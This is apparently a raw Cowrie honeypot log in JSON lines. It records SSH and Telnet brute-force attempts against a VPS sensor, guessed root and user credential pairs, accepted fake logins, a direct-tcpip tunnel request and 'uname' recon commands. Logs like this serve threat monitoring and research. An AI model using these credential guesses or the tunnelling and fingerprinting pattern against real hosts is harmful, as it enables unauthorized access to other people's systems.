{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T08:24:55.016541Z","src_ip":"212.227.235.229","session":"1ae0ca5d940b"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:24:55.401543Z","src_ip":"212.227.235.229","session":"1ae0ca5d940b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T08:24:55.530523Z","session":"1ae0ca5d940b"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":59486,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d5c39a8cae3","protocol":"ssh","message":"New connection: 51.79.164.132:59486 (1.2.3.4:22) [session: 5d5c39a8cae3]","sensor":"my-vps","timestamp":"2025-08-28T08:25:13.091997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:25:13.092870Z","src_ip":"51.79.164.132","session":"5d5c39a8cae3"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:25:13.281749Z","src_ip":"51.79.164.132","session":"5d5c39a8cae3"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:25:21.093059Z","src_ip":"51.79.164.132","session":"5d5c39a8cae3"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":36187,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef61a332cc12","protocol":"ssh","message":"New connection: 80.94.95.15:36187 (1.2.3.4:22) [session: ef61a332cc12]","sensor":"my-vps","timestamp":"2025-08-28T08:25:23.482474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:25:23.483389Z","src_ip":"80.94.95.15","session":"ef61a332cc12"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:25:23.575242Z","src_ip":"80.94.95.15","session":"ef61a332cc12"}
{"eventid":"cowrie.login.failed","username":"user","password":"chloe","message":"login attempt [user/chloe] failed","sensor":"my-vps","timestamp":"2025-08-28T08:25:24.277244Z","src_ip":"80.94.95.15","session":"ef61a332cc12"}
{"eventid":"cowrie.login.failed","username":"user","password":"astros","message":"login attempt [user/astros] failed","sensor":"my-vps","timestamp":"2025-08-28T08:25:25.372064Z","src_ip":"80.94.95.15","session":"ef61a332cc12"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234567890q","message":"login attempt [user/1234567890q] failed","sensor":"my-vps","timestamp":"2025-08-28T08:25:26.771912Z","src_ip":"80.94.95.15","session":"ef61a332cc12"}
{"eventid":"cowrie.login.failed","username":"user","password":"10101010","message":"login attempt [user/10101010] failed","sensor":"my-vps","timestamp":"2025-08-28T08:25:27.871206Z","src_ip":"80.94.95.15","session":"ef61a332cc12"}
{"eventid":"cowrie.login.failed","username":"user","password":"stephanie","message":"login attempt [user/stephanie] failed","sensor":"my-vps","timestamp":"2025-08-28T08:25:29.267562Z","src_ip":"80.94.95.15","session":"ef61a332cc12"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:25:30.362050Z","src_ip":"80.94.95.15","session":"ef61a332cc12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47304,"dst_ip":"1.2.3.4","dst_port":22,"session":"1637b3c56148","protocol":"ssh","message":"New connection: 212.227.125.160:47304 (1.2.3.4:22) [session: 1637b3c56148]","sensor":"my-vps","timestamp":"2025-08-28T08:25:37.763008Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:25:37.802894Z","src_ip":"212.227.125.160","session":"1637b3c56148"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:26:04.890202Z","src_ip":"212.227.235.229","session":"1ae0ca5d940b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:26:09.523169Z","src_ip":"154.94.19.197","session":"f7ac6d50cbf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45320,"dst_ip":"1.2.3.4","dst_port":22,"session":"360568a54b6f","protocol":"ssh","message":"New connection: 212.227.235.229:45320 (1.2.3.4:22) [session: 360568a54b6f]","sensor":"my-vps","timestamp":"2025-08-28T08:26:20.937818Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:26:21.068536Z","src_ip":"212.227.235.229","session":"360568a54b6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49210,"dst_ip":"1.2.3.4","dst_port":22,"session":"38b7abaf2e2e","protocol":"ssh","message":"New connection: 212.227.125.160:49210 (1.2.3.4:22) [session: 38b7abaf2e2e]","sensor":"my-vps","timestamp":"2025-08-28T08:27:09.997240Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:27:10.085402Z","src_ip":"212.227.125.160","session":"38b7abaf2e2e"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":53796,"dst_ip":"1.2.3.4","dst_port":23,"session":"942facf677dd","protocol":"telnet","message":"New connection: 176.65.149.186:53796 (1.2.3.4:23) [session: 942facf677dd]","sensor":"my-vps","timestamp":"2025-08-28T08:27:10.375392Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:27:10.412695Z","src_ip":"176.65.149.186","session":"942facf677dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:27:10.852756Z","src_ip":"176.65.149.186","session":"942facf677dd"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T08:27:10.854424Z","src_ip":"176.65.149.186","session":"942facf677dd"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T08:27:10.855250Z","src_ip":"176.65.149.186","session":"942facf677dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57176,"dst_ip":"1.2.3.4","dst_port":22,"session":"be7bc41a1334","protocol":"ssh","message":"New connection: 212.227.235.229:57176 (1.2.3.4:22) [session: be7bc41a1334]","sensor":"my-vps","timestamp":"2025-08-28T08:27:35.771865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:27:35.814867Z","src_ip":"212.227.235.229","session":"be7bc41a1334"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:27:35.960107Z","src_ip":"212.227.235.229","session":"be7bc41a1334"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T08:27:36.511977Z","src_ip":"212.227.235.229","session":"be7bc41a1334"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:27:37.648758Z","src_ip":"212.227.235.229","session":"be7bc41a1334"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38128,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c597031e8e4","protocol":"ssh","message":"New connection: 212.227.125.160:38128 (1.2.3.4:22) [session: 8c597031e8e4]","sensor":"my-vps","timestamp":"2025-08-28T08:28:22.631840Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38134,"dst_ip":"1.2.3.4","dst_port":22,"session":"8586d498063f","protocol":"ssh","message":"New connection: 212.227.125.160:38134 (1.2.3.4:22) [session: 8586d498063f]","sensor":"my-vps","timestamp":"2025-08-28T08:28:26.167743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:28:26.169762Z","src_ip":"212.227.125.160","session":"8586d498063f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T08:28:26.398638Z","src_ip":"212.227.125.160","session":"8586d498063f"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T08:28:28.740612Z","src_ip":"212.227.125.160","session":"8586d498063f"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:28:30.547195Z","src_ip":"212.227.125.160","session":"8586d498063f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36038,"dst_ip":"1.2.3.4","dst_port":22,"session":"43e2383486e8","protocol":"ssh","message":"New connection: 212.227.125.160:36038 (1.2.3.4:22) [session: 43e2383486e8]","sensor":"my-vps","timestamp":"2025-08-28T08:28:43.238367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:28:43.239524Z","src_ip":"212.227.125.160","session":"43e2383486e8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T08:28:43.460216Z","src_ip":"212.227.125.160","session":"43e2383486e8"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:28:45.022885Z","src_ip":"212.227.125.160","session":"43e2383486e8"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:28:46.241928Z","src_ip":"212.227.125.160","session":"43e2383486e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36050,"dst_ip":"1.2.3.4","dst_port":22,"session":"32cb931d25b4","protocol":"ssh","message":"New connection: 212.227.125.160:36050 (1.2.3.4:22) [session: 32cb931d25b4]","sensor":"my-vps","timestamp":"2025-08-28T08:28:47.115119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:28:47.116030Z","src_ip":"212.227.125.160","session":"32cb931d25b4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T08:28:47.979996Z","src_ip":"212.227.125.160","session":"32cb931d25b4"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:28:48.623917Z","src_ip":"212.227.125.160","session":"32cb931d25b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:28:50.514302Z","src_ip":"212.227.125.160","session":"32cb931d25b4"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-28T08:28:50.515151Z","src_ip":"212.227.125.160","session":"32cb931d25b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:28:50.729968Z","src_ip":"212.227.125.160","session":"32cb931d25b4"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:28:50.731297Z","src_ip":"212.227.125.160","session":"32cb931d25b4"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":46194,"dst_ip":"1.2.3.4","dst_port":22,"session":"371e16c5b4c5","protocol":"ssh","message":"New connection: 193.32.162.145:46194 (1.2.3.4:22) [session: 371e16c5b4c5]","sensor":"my-vps","timestamp":"2025-08-28T08:28:59.642743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:28:59.643456Z","src_ip":"193.32.162.145","session":"371e16c5b4c5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T08:28:59.673884Z","src_ip":"193.32.162.145","session":"371e16c5b4c5"}
{"eventid":"cowrie.login.success","username":"root","password":"solana","message":"login attempt [root/solana] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:28:59.766265Z","src_ip":"193.32.162.145","session":"371e16c5b4c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:28:59.841491Z","src_ip":"193.32.162.145","session":"371e16c5b4c5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:28:59.842279Z","src_ip":"193.32.162.145","session":"371e16c5b4c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:28:59.873729Z","src_ip":"193.32.162.145","session":"371e16c5b4c5"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:28:59.874981Z","src_ip":"193.32.162.145","session":"371e16c5b4c5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50250,"dst_ip":"1.2.3.4","dst_port":22,"session":"0edbc90cca23","protocol":"ssh","message":"New connection: 51.79.164.132:50250 (1.2.3.4:22) [session: 0edbc90cca23]","sensor":"my-vps","timestamp":"2025-08-28T08:29:19.825683Z"}
